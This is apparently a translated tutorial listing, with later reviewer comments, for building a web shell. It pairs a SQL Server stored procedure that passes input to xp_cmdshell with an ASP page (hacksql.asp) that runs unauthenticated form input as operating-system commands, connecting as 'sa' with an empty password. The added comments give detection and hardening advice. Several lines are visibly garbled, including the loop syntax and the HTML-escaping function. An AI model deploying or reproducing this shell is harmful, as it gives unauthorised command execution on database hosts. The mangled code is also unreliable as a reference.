program | Stored procedure
1. First, in a SQL Server database you have access to, create a stored procedure, for example Ddy, as follows:
-- Ddy is a thin wrapper around master..xp_cmdshell: the string passed in @cmd
-- (at most 50 characters) is executed as an operating-system command on the
-- database host, in the security context of the SQL Server service account
-- (or of the xp_cmdshell proxy account when the caller is not a sysadmin).
-- Defender's view: xp_cmdshell is disabled by default on SQL Server 2005 and
-- later and should stay disabled (sp_configure 'xp_cmdshell'). A user-created
-- procedure that references xp_cmdshell, like this one, is worth alerting on
-- when auditing a database.
CREATE PROCEDURE Ddy
-- Caller-supplied command text; the procedure performs no validation on it.
@cmd varchar (50)
As
EXEC master.. xp_cmdshell @cmd
2. The ASP program (hacksql.asp) is as follows:
<%
' Entry point. The POSTed form field "cmd" is read and trimmed; nothing in this
' listing authenticates or authorises the requester before the value is used.
Cmd=trim (Request.Form ("cmd"))
' A non-empty value is handed to Work (), which forwards it to the database;
' an empty value only renders the input form via Show ().
If cmd<> "" Then
Work ()
Else
Show ()
End If
' Work: sends the request-supplied cmd value to the Ddy stored procedure and
' writes each returned row back to the HTTP response.
' NOTE(review): several lines here look mangled by extraction or translation
' and are kept exactly as published.
' Defender's view: this is the pattern of a web shell backed by xp_cmdshell.
' On the database host it typically shows up as sqlservr.exe spawning cmd.exe,
' and in SQL Server auditing as executions of xp_cmdshell.
function work ()
Set Conn=server. CreateObject ("Adodb.connection")
Set Rs=server. CreateObject ("Adodb.recordset")
' Connects to data source "xx" as the built-in "sa" login with an empty
' password. Hardening: disable or rename sa, require strong credentials, and
' have web applications connect with a least-privileged login.
Conn. Open "xx", "sa", ""
' The statement is built by concatenating the raw request value into SQL text,
' so it is injectable by construction; legitimate code would bind the value
' through a parameterised ADODB.Command instead.
sql= "exec ddy '" &cmd& ""
Rs. Open Sql,conn
' Each row's first column is passed through Htmlencode2 and echoed inside
' <pre> tags; "No" is written when the recordset is empty.
If not Rs. EOF Then
Do as not rs.eof
Response.Write "<pre>" &htmlencode2 (Trim (RS (0)) & "</pre>"
Rs. MoveNext
Loop
Else
Response.Write "No"
End If
' Cleanup: close the recordset if its State is 1, then release both objects.
If Rs. State=1 then Rs.close
Set rs=nothing
Conn. Close
Set conn=nothing
End Function
' Show: renders the input form. The form posts a single text field named
' "cmd" back to hacksql.asp; the markup shown carries no anti-forgery token
' and no access control of any kind.
Function Show ()
%>
<form action=hacksql.asp method=post>
Please enter DOS command: <input type=text name=cmd>
<input type=submit value= "OK" >
</form>
<%
End Function
' Htmlencode2: walks str one character at a time and builds a display string
' for HTML output. Returns "" when str is Null.
' NOTE(review): the replacement strings below were presumably HTML entities in
' the original; as extracted, "<", ">", "&" and "'" map to themselves and the
' tab and space cases append empty strings, so the function as printed escapes
' nothing. Command output is untrusted data; the built-in Server.HTMLEncode is
' the safer choice for rendering it.
function Htmlencode2 (str) '--------conversion functions (more neat for display)
Dim result
Dim l
' Null input yields an empty string rather than an error.
If IsNull (str) Then
Htmlencode2= ""
Exit function
End If
L=len (str)
Result= ""
Dim i
For i = 1 to L
Select Case Mid (str,i,1)
Case "<"
Result=result+ "<"
Case ">"
result=result+ ">"
' Chr (34) is the double-quote character.
Case Chr (34)
result=result+ "" "
Case "&"
result=result+ "&"
' Carriage return becomes an HTML line break.
Case Chr (13)
result=result+ "<br>"
' Chr (9) is the tab character.
Case Chr (9)
Result=result+ ""
Case "'"
result=result+ "'"
' Chr (32) is the space character; the nested test looks at the neighbouring
' characters. NOTE(review): "=CHR" and "CHR (?)" below are garbled in the
' source, so the intended comparison cannot be confirmed from this listing.
Case Chr (32)
Result=result+ ""
If I+1<=l and i-1>0 then
If Mid (str,i+1,1) =CHR or mid (str,i+1,1) =CHR (9) or mid (str,i-1,1) =CHR (?) or mid (str,i-1,1) =CHR (9) Then
Result=result+ ""
Else
Result=result+ ""
End If
Else
Result=result+ ""
End If
' Every other character is copied through unchanged.
Case Else
Result=result+mid (str,i,1)
End Select
Next
Htmlencode2=result
End Function
%>